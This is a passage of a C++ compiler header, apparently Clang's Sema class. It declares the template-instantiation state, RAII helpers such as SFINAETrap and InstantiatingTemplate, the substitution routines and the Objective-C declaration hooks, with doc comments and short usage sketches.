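///   for (const Sema::CodeSynthesisContext &Ctx : S.CodeSynthesisContexts)
///     if (Ctx.isInstantiationRecord())
///       noteLocation(Ctx.PointOfInstantiation);
/// \endcode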
/// Specializations whose definitions are currently being instantiated.
llvm::DenseSet<std::pair<Decl *, unsigned>> InstantiatingSpecializations;
/// Non-dependent types used in templates that have already been instantiated
/// by some template instantiation.
llvm::DenseSet<QualType> InstantiatedNonDependentTypes;
/// Extra modules inspected when performing a lookup during a template
/// instantiation. Computed lazily.
SmallVector<Module*, 16> CodeSynthesisContextLookupModules;
/// Cache of additional modules that should be used for name lookup
/// within the current template instantiation. Computed lazily; use
/// getLookupModules() to get a complete set.
llvm::DenseSet<Module*> LookupModulesCache;
/// Get the set of additional modules that should be checked during
/// name lookup. A module and its imports become visible when instantiating a
/// template defined within it.
llvm::DenseSet<Module*> &getLookupModules();
/// Map from the most recent declaration of a namespace to the most
/// recent visible declaration of that namespace.
llvm::DenseMap<NamedDecl*, NamedDecl*> VisibleNamespaceCache;
/// Whether we are in a SFINAE context that is not associated with
/// template instantiation.
///
/// This is used when setting up a SFINAE trap (see \c SFINAETrap) outside
/// of a template instantiation or template argument deduction.
bool InNonInstantiationSFINAEContext;
/// The number of \p CodeSynthesisContexts that are not template
/// instantiations and, therefore, should not be counted as part of the
/// instantiation depth.
///
/// When the instantiation depth reaches the user-configurable limit
/// \p LangOptions::InstantiationDepth we will abort instantiation.
// FIXME: Should we have a similar limit for other forms of synthesis?
unsigned NonInstantiationEntries;
/// The depth of the context stack at the point when the most recent
/// error or warning was produced.
///
/// This value is used to suppress printing of redundant context stacks
/// when there are multiple errors or warnings in the same instantiation.
// FIXME: Does this belong in Sema? It's tough to implement it anywhere else.
unsigned LastEmittedCodeSynthesisContextDepth = 0;
/// The template instantiation callbacks to trace or track
/// instantiations (objects can be chained).
///
/// These callbacks are used to print, trace or track template
/// instantiations as they are being constructed.
std::vector<std::unique_ptr<TemplateInstantiationCallback>>
TemplateInstCallbacks;
/// The current index into pack expansion arguments that will be
/// used for substitution of parameter packs.
///
/// The pack expansion index will be -1 to indicate that parameter packs
/// should be instantiated as themselves. Otherwise, the index specifies
/// which argument within the parameter pack will be used for substitution.
int ArgumentPackSubstitutionIndex;
/// RAII object used to change the argument pack substitution index
/// within a \c Sema object.
///
/// See \c ArgumentPackSubstitutionIndex for more information.
class ArgumentPackSubstitutionIndexRAII {
Sema &Self;
int OldSubstitutionIndex;
public:
ArgumentPackSubstitutionIndexRAII(Sema &Self, int NewSubstitutionIndex)
: Self(Self), OldSubstitutionIndex(Self.ArgumentPackSubstitutionIndex) {
Self.ArgumentPackSubstitutionIndex = NewSubstitutionIndex;
}
~ArgumentPackSubstitutionIndexRAII() {
Self.ArgumentPackSubstitutionIndex = OldSubstitutionIndex;
}
};
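/// Usage sketch: substitute the I-th element of each expanded parameter pack
/// while instantiating a pattern ('S', 'I', 'PatternExpr' and 'TemplateArgs'
/// are assumed locals).
/// \code
///   Sema::ArgumentPackSubstitutionIndexRAII SubstIndex(S, I);
///   ExprResult E = S.SubstExpr(PatternExpr, TemplateArgs);
/// \endcode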
friend class ArgumentPackSubstitutionRAII;
/// For each declaration that involved template argument deduction, the
/// set of diagnostics that were suppressed during that template argument
/// deduction.
///
/// FIXME: Serialize this structure to the AST file.
typedef llvm::DenseMap<Decl *, SmallVector<PartialDiagnosticAt, 1> >
SuppressedDiagnosticsMap;
SuppressedDiagnosticsMap SuppressedDiagnostics;
/// A stack object to be created when performing template
/// instantiation.
///
/// Construction of an object of type \c InstantiatingTemplate
/// pushes the current instantiation onto the stack of active
/// instantiations. If the size of this stack exceeds the maximum
/// number of recursive template instantiations, construction
/// produces an error and evaluates true.
///
/// Destruction of this object will pop the named instantiation off
/// the stack.
struct InstantiatingTemplate {
/// Note that we are instantiating a class template,
/// function template, variable template, alias template,
/// or a member thereof.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
Decl *Entity,
SourceRange InstantiationRange = SourceRange());
struct ExceptionSpecification {};
/// Note that we are instantiating an exception specification
/// of a function template.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
FunctionDecl *Entity, ExceptionSpecification,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating a default argument in a
/// template-id.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
TemplateParameter Param, TemplateDecl *Template,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange = SourceRange());
/// Note that we are substituting either explicitly-specified or
/// deduced template arguments during function template argument deduction.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
FunctionTemplateDecl *FunctionTemplate,
ArrayRef<TemplateArgument> TemplateArgs,
CodeSynthesisContext::SynthesisKind Kind,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating as part of template
/// argument deduction for a class template declaration.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
TemplateDecl *Template,
ArrayRef<TemplateArgument> TemplateArgs,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating as part of template
/// argument deduction for a class template partial
/// specialization.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ClassTemplatePartialSpecializationDecl *PartialSpec,
ArrayRef<TemplateArgument> TemplateArgs,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating as part of template
/// argument deduction for a variable template partial
/// specialization.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
VarTemplatePartialSpecializationDecl *PartialSpec,
ArrayRef<TemplateArgument> TemplateArgs,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating a default argument for a function
/// parameter.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ParmVarDecl *Param,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange = SourceRange());
/// Note that we are substituting prior template arguments into a
/// non-type parameter.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
NamedDecl *Template,
NonTypeTemplateParmDecl *Param,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange);
/// Note that we are substituting prior template arguments into a
/// template template parameter.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
NamedDecl *Template,
TemplateTemplateParmDecl *Param,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange);
/// Note that we are checking the default template argument
/// against the template parameter for a given template-id.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
TemplateDecl *Template,
NamedDecl *Param,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange);
struct ConstraintsCheck {};
/// \brief Note that we are checking the constraints associated with some
/// constrained entity (a concept declaration or a template with associated
/// constraints).
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ConstraintsCheck, NamedDecl *Template,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange);
struct ConstraintSubstitution {};
/// \brief Note that we are checking a constraint expression associated
/// with a template declaration or as part of the satisfaction check of a
/// concept.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ConstraintSubstitution, NamedDecl *Template,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange);
struct ConstraintNormalization {};
/// \brief Note that we are normalizing a constraint expression.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ConstraintNormalization, NamedDecl *Template,
SourceRange InstantiationRange);
struct ParameterMappingSubstitution {};
/// \brief Note that we are substituting into the parameter mapping of an
/// atomic constraint during constraint normalization.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ParameterMappingSubstitution, NamedDecl *Template,
SourceRange InstantiationRange);
/// \brief Note that we are substituting template arguments into a part of
/// a requirement of a requires expression.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
concepts::Requirement *Req,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange = SourceRange());
/// \brief Note that we are checking the satisfaction of the constraint
/// expression inside of a nested requirement.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
concepts::NestedRequirement *Req, ConstraintsCheck,
SourceRange InstantiationRange = SourceRange());
/// Note that we have finished instantiating this template.
void Clear();
~InstantiatingTemplate() { Clear(); }
/// Determines whether we have exceeded the maximum
/// recursive template instantiations.
bool isInvalid() const { return Invalid; }
/// Determine whether we are already instantiating this
/// specialization in some surrounding active instantiation.
bool isAlreadyInstantiating() const { return AlreadyInstantiating; }
private:
Sema &SemaRef;
bool Invalid;
bool AlreadyInstantiating;
bool CheckInstantiationDepth(SourceLocation PointOfInstantiation,
SourceRange InstantiationRange);
InstantiatingTemplate(
Sema &SemaRef, CodeSynthesisContext::SynthesisKind Kind,
SourceLocation PointOfInstantiation, SourceRange InstantiationRange,
Decl *Entity, NamedDecl *Template = nullptr,
ArrayRef<TemplateArgument> TemplateArgs = None,
sema::TemplateDeductionInfo *DeductionInfo = nullptr);
InstantiatingTemplate(const InstantiatingTemplate&) = delete;
InstantiatingTemplate&
operator=(const InstantiatingTemplate&) = delete;
};
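/// Typical usage sketch ('S', 'PointOfInstantiation' and 'Spec' assumed):
/// \code
///   Sema::InstantiatingTemplate Inst(S, PointOfInstantiation, Spec);
///   if (Inst.isInvalid() || Inst.isAlreadyInstantiating())
///     return;  // depth limit exceeded, or already being instantiated
///   // ... perform the instantiation; the destructor pops the context ...
/// \endcode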
void pushCodeSynthesisContext(CodeSynthesisContext Ctx);
void popCodeSynthesisContext();
/// Determine whether we are currently performing template instantiation.
bool inTemplateInstantiation() const {
return CodeSynthesisContexts.size() > NonInstantiationEntries;
}
void PrintContextStack() {
if (!CodeSynthesisContexts.empty() &&
CodeSynthesisContexts.size() != LastEmittedCodeSynthesisContextDepth) {
PrintInstantiationStack();
LastEmittedCodeSynthesisContextDepth = CodeSynthesisContexts.size();
}
if (PragmaAttributeCurrentTargetDecl)
PrintPragmaAttributeInstantiationPoint();
}
void PrintInstantiationStack();
void PrintPragmaAttributeInstantiationPoint();
/// Determines whether we are currently in a context where
/// template argument substitution failures are not considered
/// errors.
///
/// \returns An empty \c Optional if we're not in a SFINAE context.
/// Otherwise, contains a pointer that, if non-NULL, contains the nearest
/// template-deduction context object, which can be used to capture
/// diagnostics that will be suppressed.
Optional<sema::TemplateDeductionInfo *> isSFINAEContext() const;
/// Determines whether we are currently in a context that
/// is not evaluated as per C++ [expr] p5.
bool isUnevaluatedContext() const {
assert(!ExprEvalContexts.empty() &&
"Must be in an expression evaluation context");
return ExprEvalContexts.back().isUnevaluated();
}
/// RAII class used to determine whether SFINAE has
/// trapped any errors that occur during template argument
/// deduction.
class SFINAETrap {
Sema &SemaRef;
unsigned PrevSFINAEErrors;
bool PrevInNonInstantiationSFINAEContext;
bool PrevAccessCheckingSFINAE;
bool PrevLastDiagnosticIgnored;
public:
explicit SFINAETrap(Sema &SemaRef, bool AccessCheckingSFINAE = false)
: SemaRef(SemaRef), PrevSFINAEErrors(SemaRef.NumSFINAEErrors),
PrevInNonInstantiationSFINAEContext(
SemaRef.InNonInstantiationSFINAEContext),
PrevAccessCheckingSFINAE(SemaRef.AccessCheckingSFINAE),
PrevLastDiagnosticIgnored(
SemaRef.getDiagnostics().isLastDiagnosticIgnored())
{
if (!SemaRef.isSFINAEContext())
SemaRef.InNonInstantiationSFINAEContext = true;
SemaRef.AccessCheckingSFINAE = AccessCheckingSFINAE;
}
~SFINAETrap() {
SemaRef.NumSFINAEErrors = PrevSFINAEErrors;
SemaRef.InNonInstantiationSFINAEContext
= PrevInNonInstantiationSFINAEContext;
SemaRef.AccessCheckingSFINAE = PrevAccessCheckingSFINAE;
SemaRef.getDiagnostics().setLastDiagnosticIgnored(
PrevLastDiagnosticIgnored);
}
/// Determine whether any SFINAE errors have been trapped.
bool hasErrorOccurred() const {
return SemaRef.NumSFINAEErrors > PrevSFINAEErrors;
}
};
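/// Usage sketch: attempt a substitution and swallow any SFINAE failure
/// ('S', 'E' and 'TemplateArgs' assumed).
/// \code
///   Sema::SFINAETrap Trap(S);
///   ExprResult R = S.SubstExpr(E, TemplateArgs);
///   if (Trap.hasErrorOccurred() || R.isInvalid())
///     return ExprError();
/// \endcode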
/// RAII class used to indicate that we are performing provisional
/// semantic analysis to determine the validity of a construct, so
/// typo-correction and diagnostics in the immediate context (not within
/// implicitly-instantiated templates) should be suppressed.
class TentativeAnalysisScope {
Sema &SemaRef;
// FIXME: Using a SFINAETrap for this is a hack.
SFINAETrap Trap;
bool PrevDisableTypoCorrection;
public:
explicit TentativeAnalysisScope(Sema &SemaRef)
: SemaRef(SemaRef), Trap(SemaRef, true),
PrevDisableTypoCorrection(SemaRef.DisableTypoCorrection) {
SemaRef.DisableTypoCorrection = true;
}
~TentativeAnalysisScope() {
SemaRef.DisableTypoCorrection = PrevDisableTypoCorrection;
}
};
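/// Usage sketch: probe whether a construct would be valid without emitting
/// diagnostics or typo-correcting ('S', 'Pattern' and 'TemplateArgs'
/// assumed).
/// \code
///   Sema::TentativeAnalysisScope Tentative(S);
///   StmtResult Probe = S.SubstStmt(Pattern, TemplateArgs);
///   bool WouldBeValid = !Probe.isInvalid();
/// \endcode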
/// The current instantiation scope used to store local
/// variables.
LocalInstantiationScope *CurrentInstantiationScope;
/// Tracks whether we are in a context where typo correction is
/// disabled.
bool DisableTypoCorrection;
/// The number of typos corrected by CorrectTypo.
unsigned TyposCorrected;
typedef llvm::SmallSet<SourceLocation, 2> SrcLocSet;
typedef llvm::DenseMap<IdentifierInfo *, SrcLocSet> IdentifierSourceLocations;
/// A cache containing identifiers for which typo correction failed and
/// their locations, so that repeated attempts to correct an identifier in a
/// given location are ignored if typo correction already failed for it.
IdentifierSourceLocations TypoCorrectionFailures;
/// Worker object for performing CFG-based warnings.
sema::AnalysisBasedWarnings AnalysisWarnings;
threadSafety::BeforeSet *ThreadSafetyDeclCache;
/// An entity for which implicit template instantiation is required.
///
/// The source location associated with the declaration is the first place in
/// the source code where the declaration was "used". It is not necessarily
/// the point of instantiation (which will be either before or after the
/// namespace-scope declaration that triggered this implicit instantiation);
/// however, it is the location that diagnostics should generally refer to,
/// because users will need to know what code triggered the instantiation.
typedef std::pair<ValueDecl *, SourceLocation> PendingImplicitInstantiation;
/// The queue of implicit template instantiations that are required
/// but have not yet been performed.
std::deque<PendingImplicitInstantiation> PendingInstantiations;
/// Queue of implicit template instantiations that cannot be performed
/// eagerly.
SmallVector<PendingImplicitInstantiation, 1> LateParsedInstantiations;
class GlobalEagerInstantiationScope {
public:
GlobalEagerInstantiationScope(Sema &S, bool Enabled)
: S(S), Enabled(Enabled) {
if (!Enabled) return;
SavedPendingInstantiations.swap(S.PendingInstantiations);
SavedVTableUses.swap(S.VTableUses);
}
void perform() {
if (Enabled) {
S.DefineUsedVTables();
S.PerformPendingInstantiations();
}
}
~GlobalEagerInstantiationScope() {
if (!Enabled) return;
// Restore the set of pending vtables.
assert(S.VTableUses.empty() &&
"VTableUses should be empty before it is discarded.");
S.VTableUses.swap(SavedVTableUses);
// Restore the set of pending implicit instantiations.
assert(S.PendingInstantiations.empty() &&
"PendingInstantiations should be empty before it is discarded.");
S.PendingInstantiations.swap(SavedPendingInstantiations);
}
private:
Sema &S;
SmallVector<VTableUse, 16> SavedVTableUses;
std::deque<PendingImplicitInstantiation> SavedPendingInstantiations;
bool Enabled;
};
/// The queue of implicit template instantiations that are required
/// and must be performed within the current local scope.
///
/// This queue is only used for member functions of local classes in
/// templates, which must be instantiated in the same scope as their
/// enclosing function, so that they can reference function-local
/// types, static variables, enumerators, etc.
std::deque<PendingImplicitInstantiation> PendingLocalImplicitInstantiations;
class LocalEagerInstantiationScope {
public:
LocalEagerInstantiationScope(Sema &S) : S(S) {
SavedPendingLocalImplicitInstantiations.swap(
S.PendingLocalImplicitInstantiations);
}
void perform() { S.PerformPendingInstantiations(/*LocalOnly=*/true); }
~LocalEagerInstantiationScope() {
assert(S.PendingLocalImplicitInstantiations.empty() &&
"there shouldn't be any pending local implicit instantiations");
SavedPendingLocalImplicitInstantiations.swap(
S.PendingLocalImplicitInstantiations);
}
private:
Sema &S;
std::deque<PendingImplicitInstantiation>
SavedPendingLocalImplicitInstantiations;
};
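/// Sketch of how the two scopes pair up when instantiating a definition
/// ('S' assumed; 'Recursive' says whether pending global instantiations
/// should be drained here as well).
/// \code
///   Sema::GlobalEagerInstantiationScope GlobalInstantiations(S, Recursive);
///   Sema::LocalEagerInstantiationScope LocalInstantiations(S);
///   // ... instantiate the function or variable definition ...
///   LocalInstantiations.perform();
///   GlobalInstantiations.perform();
/// \endcode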
/// A helper class for building up ExtParameterInfos.
class ExtParameterInfoBuilder {
SmallVector<FunctionProtoType::ExtParameterInfo, 16> Infos;
bool HasInteresting = false;
public:
/// Set the ExtParameterInfo for the parameter at the given index.
void set(unsigned index, FunctionProtoType::ExtParameterInfo info) {
assert(Infos.size() <= index);
Infos.resize(index);
Infos.push_back(info);
if (!HasInteresting)
HasInteresting = (info != FunctionProtoType::ExtParameterInfo());
}
/// Return a pointer (suitable for setting in an ExtProtoInfo) to the
/// ExtParameterInfo array we've built up.
const FunctionProtoType::ExtParameterInfo *
getPointerOrNull(unsigned numParams) {
if (!HasInteresting) return nullptr;
Infos.resize(numParams);
return Infos.data();
}
};
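/// Usage sketch: carry over interesting parameter infos from an existing
/// prototype ('Proto', 'NumParams' and 'EPI' assumed).
/// \code
///   Sema::ExtParameterInfoBuilder ParamInfos;
///   for (unsigned I = 0; I != NumParams; ++I)
///     ParamInfos.set(I, Proto->getExtParameterInfo(I));
///   EPI.ExtParameterInfos = ParamInfos.getPointerOrNull(NumParams);
/// \endcode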
void PerformPendingInstantiations(bool LocalOnly = false);
TypeSourceInfo *SubstType(TypeSourceInfo *T,
const MultiLevelTemplateArgumentList &TemplateArgs,
SourceLocation Loc, DeclarationName Entity,
bool AllowDeducedTST = false);
QualType SubstType(QualType T,
const MultiLevelTemplateArgumentList &TemplateArgs,
SourceLocation Loc, DeclarationName Entity);
TypeSourceInfo *SubstType(TypeLoc TL,
const MultiLevelTemplateArgumentList &TemplateArgs,
SourceLocation Loc, DeclarationName Entity);
TypeSourceInfo *SubstFunctionDeclType(TypeSourceInfo *T,
const MultiLevelTemplateArgumentList &TemplateArgs,
SourceLocation Loc,
DeclarationName Entity,
CXXRecordDecl *ThisContext,
Qualifiers ThisTypeQuals);
void SubstExceptionSpec(FunctionDecl *New, const FunctionProtoType *Proto,
const MultiLevelTemplateArgumentList &Args);
bool SubstExceptionSpec(SourceLocation Loc,
FunctionProtoType::ExceptionSpecInfo &ESI,
SmallVectorImpl<QualType> &ExceptionStorage,
const MultiLevelTemplateArgumentList &Args);
ParmVarDecl *SubstParmVarDecl(ParmVarDecl *D,
const MultiLevelTemplateArgumentList &TemplateArgs,
int indexAdjustment,
Optional<unsigned> NumExpansions,
bool ExpectParameterPack);
bool SubstParmTypes(SourceLocation Loc, ArrayRef<ParmVarDecl *> Params,
const FunctionProtoType::ExtParameterInfo *ExtParamInfos,
const MultiLevelTemplateArgumentList &TemplateArgs,
SmallVectorImpl<QualType> &ParamTypes,
SmallVectorImpl<ParmVarDecl *> *OutParams,
ExtParameterInfoBuilder &ParamInfos);
ExprResult SubstExpr(Expr *E,
const MultiLevelTemplateArgumentList &TemplateArgs);
/// Substitute the given template arguments into a list of
/// expressions, expanding pack expansions if required.
///
/// \param Exprs The list of expressions to substitute into.
///
/// \param IsCall Whether this is some form of call, in which case
/// default arguments will be dropped.
///
/// \param TemplateArgs The set of template arguments to substitute.
///
/// \param Outputs Will receive all of the substituted arguments.
///
/// \returns true if an error occurred, false otherwise.
bool SubstExprs(ArrayRef<Expr *> Exprs, bool IsCall,
const MultiLevelTemplateArgumentList &TemplateArgs,
SmallVectorImpl<Expr *> &Outputs);
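/// Usage sketch ('S', 'ArgExprs' and 'TemplateArgs' assumed):
/// \code
///   SmallVector<Expr *, 4> SubstArgs;
///   if (S.SubstExprs(ArgExprs, /*IsCall=*/true, TemplateArgs, SubstArgs))
///     return true;  // substitution failed
/// \endcode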
StmtResult SubstStmt(Stmt *S,
const MultiLevelTemplateArgumentList &TemplateArgs);
TemplateParameterList *
SubstTemplateParams(TemplateParameterList *Params, DeclContext *Owner,
const MultiLevelTemplateArgumentList &TemplateArgs);
bool
SubstTemplateArguments(ArrayRef<TemplateArgumentLoc> Args,
const MultiLevelTemplateArgumentList &TemplateArgs,
TemplateArgumentListInfo &Outputs);
Decl *SubstDecl(Decl *D, DeclContext *Owner,
const MultiLevelTemplateArgumentList &TemplateArgs);
/// Substitute the name and return type of a defaulted 'operator<=>' to form
/// an implicit 'operator=='.
FunctionDecl *SubstSpaceshipAsEqualEqual(CXXRecordDecl *RD,
FunctionDecl *Spaceship);
ExprResult SubstInitializer(Expr *E,
const MultiLevelTemplateArgumentList &TemplateArgs,
bool CXXDirectInit);
bool
SubstBaseSpecifiers(CXXRecordDecl *Instantiation,
CXXRecordDecl *Pattern,
const MultiLevelTemplateArgumentList &TemplateArgs);
bool
InstantiateClass(SourceLocation PointOfInstantiation,
CXXRecordDecl *Instantiation, CXXRecordDecl *Pattern,
const MultiLevelTemplateArgumentList &TemplateArgs,
TemplateSpecializationKind TSK,
bool Complain = true);
bool InstantiateEnum(SourceLocation PointOfInstantiation,
EnumDecl *Instantiation, EnumDecl *Pattern,
const MultiLevelTemplateArgumentList &TemplateArgs,
TemplateSpecializationKind TSK);
bool InstantiateInClassInitializer(
SourceLocation PointOfInstantiation, FieldDecl *Instantiation,
FieldDecl *Pattern, const MultiLevelTemplateArgumentList &TemplateArgs);
struct LateInstantiatedAttribute {
const Attr *TmplAttr;
LocalInstantiationScope *Scope;
Decl *NewDecl;
LateInstantiatedAttribute(const Attr *A, LocalInstantiationScope *S,
Decl *D)
: TmplAttr(A), Scope(S), NewDecl(D)
{ }
};
typedef SmallVector<LateInstantiatedAttribute, 16> LateInstantiatedAttrVec;
void InstantiateAttrs(const MultiLevelTemplateArgumentList &TemplateArgs,
const Decl *Pattern, Decl *Inst,
LateInstantiatedAttrVec *LateAttrs = nullptr,
LocalInstantiationScope *OuterMostScope = nullptr);
void
InstantiateAttrsForDecl(const MultiLevelTemplateArgumentList &TemplateArgs,
const Decl *Pattern, Decl *Inst,
LateInstantiatedAttrVec *LateAttrs = nullptr,
LocalInstantiationScope *OuterMostScope = nullptr);
bool usesPartialOrExplicitSpecialization(
SourceLocation Loc, ClassTemplateSpecializationDecl *ClassTemplateSpec);
bool
InstantiateClassTemplateSpecialization(SourceLocation PointOfInstantiation,
ClassTemplateSpecializationDecl *ClassTemplateSpec,
TemplateSpecializationKind TSK,
bool Complain = true);
void InstantiateClassMembers(SourceLocation PointOfInstantiation,
CXXRecordDecl *Instantiation,
const MultiLevelTemplateArgumentList &TemplateArgs,
TemplateSpecializationKind TSK);
void InstantiateClassTemplateSpecializationMembers(
SourceLocation PointOfInstantiation,
ClassTemplateSpecializationDecl *ClassTemplateSpec,
TemplateSpecializationKind TSK);
NestedNameSpecifierLoc
SubstNestedNameSpecifierLoc(NestedNameSpecifierLoc NNS,
const MultiLevelTemplateArgumentList &TemplateArgs);
DeclarationNameInfo
SubstDeclarationNameInfo(const DeclarationNameInfo &NameInfo,
const MultiLevelTemplateArgumentList &TemplateArgs);
TemplateName
SubstTemplateName(NestedNameSpecifierLoc QualifierLoc, TemplateName Name,
SourceLocation Loc,
const MultiLevelTemplateArgumentList &TemplateArgs);
bool Subst(const TemplateArgumentLoc *Args, unsigned NumArgs,
TemplateArgumentListInfo &Result,
const MultiLevelTemplateArgumentList &TemplateArgs);
void InstantiateExceptionSpec(SourceLocation PointOfInstantiation,
FunctionDecl *Function);
bool CheckInstantiatedFunctionTemplateConstraints(
SourceLocation PointOfInstantiation, FunctionDecl *Decl,
ArrayRef<TemplateArgument> TemplateArgs,
ConstraintSatisfaction &Satisfaction);
FunctionDecl *InstantiateFunctionDeclaration(FunctionTemplateDecl *FTD,
const TemplateArgumentList *Args,
SourceLocation Loc);
void InstantiateFunctionDefinition(SourceLocation PointOfInstantiation,
FunctionDecl *Function,
bool Recursive = false,
bool DefinitionRequired = false,
bool AtEndOfTU = false);
VarTemplateSpecializationDecl *BuildVarTemplateInstantiation(
VarTemplateDecl *VarTemplate, VarDecl *FromVar,
const TemplateArgumentList &TemplateArgList,
const TemplateArgumentListInfo &TemplateArgsInfo,
SmallVectorImpl<TemplateArgument> &Converted,
SourceLocation PointOfInstantiation, void *InsertPos,
LateInstantiatedAttrVec *LateAttrs = nullptr,
LocalInstantiationScope *StartingScope = nullptr);
VarTemplateSpecializationDecl *CompleteVarTemplateSpecializationDecl(
VarTemplateSpecializationDecl *VarSpec, VarDecl *PatternDecl,
const MultiLevelTemplateArgumentList &TemplateArgs);
void
BuildVariableInstantiation(VarDecl *NewVar, VarDecl *OldVar,
const MultiLevelTemplateArgumentList &TemplateArgs,
LateInstantiatedAttrVec *LateAttrs,
DeclContext *Owner,
LocalInstantiationScope *StartingScope,
bool InstantiatingVarTemplate = false,
VarTemplateSpecializationDecl *PrevVTSD = nullptr);
VarDecl *getVarTemplateSpecialization(
VarTemplateDecl *VarTempl, const TemplateArgumentListInfo *TemplateArgs,
const DeclarationNameInfo &MemberNameInfo, SourceLocation TemplateKWLoc);
void InstantiateVariableInitializer(
VarDecl *Var, VarDecl *OldVar,
const MultiLevelTemplateArgumentList &TemplateArgs);
void InstantiateVariableDefinition(SourceLocation PointOfInstantiation,
VarDecl *Var, bool Recursive = false,
bool DefinitionRequired = false,
bool AtEndOfTU = false);
void InstantiateMemInitializers(CXXConstructorDecl *New,
const CXXConstructorDecl *Tmpl,
const MultiLevelTemplateArgumentList &TemplateArgs);
NamedDecl *FindInstantiatedDecl(SourceLocation Loc, NamedDecl *D,
const MultiLevelTemplateArgumentList &TemplateArgs,
bool FindingInstantiatedContext = false);
DeclContext *FindInstantiatedContext(SourceLocation Loc, DeclContext *DC,
const MultiLevelTemplateArgumentList &TemplateArgs);
// Objective-C declarations.
enum ObjCContainerKind {
OCK_None = -1,
OCK_Interface = 0,
OCK_Protocol,
OCK_Category,
OCK_ClassExtension,
OCK_Implementation,
OCK_CategoryImplementation
};
ObjCContainerKind getObjCContainerKind() const;
DeclResult actOnObjCTypeParam(Scope *S,
ObjCTypeParamVariance variance,
SourceLocation varianceLoc,
unsigned index,
IdentifierInfo *paramName,
SourceLocation paramLoc,
SourceLocation colonLoc,
ParsedType typeBound);
ObjCTypeParamList *actOnObjCTypeParamList(Scope *S, SourceLocation lAngleLoc,
ArrayRef<Decl *> typeParams,
SourceLocation rAngleLoc);
void popObjCTypeParamList(Scope *S, ObjCTypeParamList *typeParamList);
Decl *ActOnStartClassInterface(
Scope *S, SourceLocation AtInterfaceLoc, IdentifierInfo *ClassName,
SourceLocation ClassLoc, ObjCTypeParamList *typeParamList,
IdentifierInfo *SuperName, SourceLocation SuperLoc,
ArrayRef<ParsedType> SuperTypeArgs, SourceRange SuperTypeArgsRange,
Decl *const *ProtoRefs, unsigned NumProtoRefs,
const SourceLocation *ProtoLocs, SourceLocation EndProtoLoc,
const ParsedAttributesView &AttrList);
void ActOnSuperClassOfClassInterface(Scope *S,
SourceLocation AtInterfaceLoc,
ObjCInterfaceDecl *IDecl,
IdentifierInfo *ClassName,
SourceLocation ClassLoc,
IdentifierInfo *SuperName,
SourceLocation SuperLoc,
ArrayRef<ParsedType> SuperTypeArgs,
SourceRange SuperTypeArgsRange);
void ActOnTypedefedProtocols(SmallVectorImpl<Decl *> &ProtocolRefs,
SmallVectorImpl<SourceLocation> &ProtocolLocs,
IdentifierInfo *SuperName,
SourceLocation SuperLoc);
Decl *ActOnCompatibilityAlias(
SourceLocation AtCompatibilityAliasLoc,
IdentifierInfo *AliasName, SourceLocation AliasLocation,
IdentifierInfo *ClassName, SourceLocation ClassLocation);
bool CheckForwardProtocolDeclarationForCircularDependency(
IdentifierInfo *PName,
SourceLocation &PLoc, SourceLocation PrevLoc,
const ObjCList<ObjCProtocolDecl> &PList);
Decl *ActOnStartProtocolInterface(
SourceLocation AtProtoInterfaceLoc, IdentifierInfo *ProtocolName,
SourceLocation ProtocolLoc, Decl *const *ProtoRefNames,
unsigned NumProtoRefs, const SourceLocation *ProtoLocs,
SourceLocation EndProtoLoc, const ParsedAttributesView &AttrList);
Decl *ActOnStartCategoryInterface(
SourceLocation AtInterfaceLoc, IdentifierInfo *ClassName,
SourceLocation ClassLoc, ObjCTypeParamList *typeParamList,
IdentifierInfo *CategoryName, SourceLocation CategoryLoc,
Decl *const *ProtoRefs, unsigned NumProtoRefs,
const SourceLocation *ProtoLocs, SourceLocation EndProtoLoc,
const ParsedAttributesView &AttrList);
Decl *ActOnStartClassImplementation(SourceLocation AtClassImplLoc,
IdentifierInfo *ClassName,
SourceLocation ClassLoc,
IdentifierInfo *SuperClassname,
SourceLocation SuperClassLoc,
const ParsedAttributesView &AttrList);
Decl *ActOnStartCategoryImplementation(SourceLocation AtCatImplLoc,
IdentifierInfo *ClassName,
SourceLocation ClassLoc,
IdentifierInfo *CatName,
SourceLocation CatLoc,
const ParsedAttributesView &AttrList);
DeclGroupPtrTy ActOnFinishObjCImplementation(Decl *ObjCImpDecl,
ArrayRef<Decl *> Decls);
DeclGroupPtrTy ActOnForwardClassDeclaration(SourceLocation Loc,
IdentifierInfo **IdentList,
SourceLocation *IdentLocs,
